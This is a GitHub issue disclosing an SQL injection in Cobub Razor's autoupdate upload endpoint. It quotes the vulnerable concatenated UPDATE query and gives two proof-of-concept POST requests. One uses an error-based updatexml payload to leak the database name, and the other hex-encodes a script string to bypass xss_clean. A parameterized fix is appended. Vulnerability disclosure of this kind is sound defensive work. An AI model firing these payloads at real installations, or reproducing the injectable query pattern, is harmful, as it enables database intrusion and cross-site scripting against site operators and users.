cobub / razor

Cobub Razor - Open Source Mobile Analytics Solution
http://www.cobub.com

SQLi vulnerability #178

Open LioTree opened 8 months ago

LioTree commented 8 months ago

Hi, I want to report a SQLi vulnerability.

In https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/controllers/manage/autoupdate.php#L187 $description is controlled by users and has few restrictions on its format.

$this->form_validation->set_rules('description', lang('v_man_au_updateLog'), 'trim|required|xss_clean');
$this->form_validation->set_rules('versionid', lang('v_man_au_versionID'), 'trim|required|xss_clean|callback_versionid_check');
//......
$description = $this->input->post('description');
$versionid = $this->input->post('versionid');

$versioninfo = $this->channel->getversionid($cp_id, $versionid, $upinfo);
if ($versioninfo) {
    $isupdate = $this->channel->updateapk($userid, $cp_id, $description, $updateurl, $versionid, $upinfo);
    if ($isupdate) {
        $this->data['apkinfo'] = $this->channel->getakpinfo($userid, $cp_id);
        $this->load->view('autoupdate/updateandrlist', $this->data);
    }
}

In the ChannelModel::updateapk method, $description is inserted into the SQL directly. https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/models/channelmodel.php#L482

$sql = "update ".$this->db->dbprefix('channel_product')." set updateurl ='$updateurl' , description='$description' ,version='$versionid',date='$date' where cp_id = $cp_id and user_id = $userid";
$this->db->query($sql);
$affect = $this->db->affected_rows();

PoC (assume there exists a product with an ID of 1):

POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="userfile"; filename="base.apk"
Content-Type: application/octet-stream

......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="versionid"

1.4.0
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="description"

xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '
-----------------------------4510835592045788119549478332--


XSS can also be triggered through manipulated error messages. Techniques such as hexadecimal encoding in SQL can be used to bypass CodeIgniter's xss_clean function.

POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="userfile"; filename="a.apk"
Content-Type: application/octet-stream

......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="versionid"

1.5.0
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="description"

xxxx' or updatexml(1,concat(0x7e,(select 0x3c7363726970743e616c6572742831293c2f7363726970743e)),0) or '
-----------------------------94712324341088669424272486117--

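For reference, the query above rewritten with CodeIgniter query bindings so that $description (and the other request-derived values) can never be parsed as SQL. This is an added example, not code from the razor project or from the reporter; the column names, table prefix and call signature follow the snippets quoted in the issue, and the $date assignment is an assumption.

```php
<?php
// Added example (not the project's own code): a hardened ChannelModel::updateapk.
// The original builds the UPDATE by string concatenation, so a single quote in
// $description closes the literal and the rest of the value runs as SQL.
class ChannelModel extends CI_Model
{
    public function updateapk($userid, $cp_id, $description, $updateurl, $versionid, $upinfo)
    {
        // Assumption: the original sets $date before the query; the format is a guess.
        $date = date('Y-m-d H:i:s');

        // Every request-derived value is passed as a bound parameter ("?").
        // CodeIgniter escapes each binding itself, so quotes, comments or
        // function calls inside $description stay inside the string value.
        $sql = 'UPDATE ' . $this->db->dbprefix('channel_product')
             . ' SET updateurl = ?, description = ?, version = ?, date = ?'
             . ' WHERE cp_id = ? AND user_id = ?';

        $this->db->query($sql, array($updateurl, $description, $versionid, $date, $cp_id, $userid));

        // Same contract as the original: true when a row was changed.
        return $this->db->affected_rows() > 0;
    }
}
```

Because the PoC relies on MySQL's error text being rendered, setting `$db['default']['db_debug'] = FALSE` in config/database.php also keeps database errors off the page; the stored description should still be escaped on output (for example with CodeIgniter's html_escape()), since xss_clean on input does not cover values that are hex-encoded before storage.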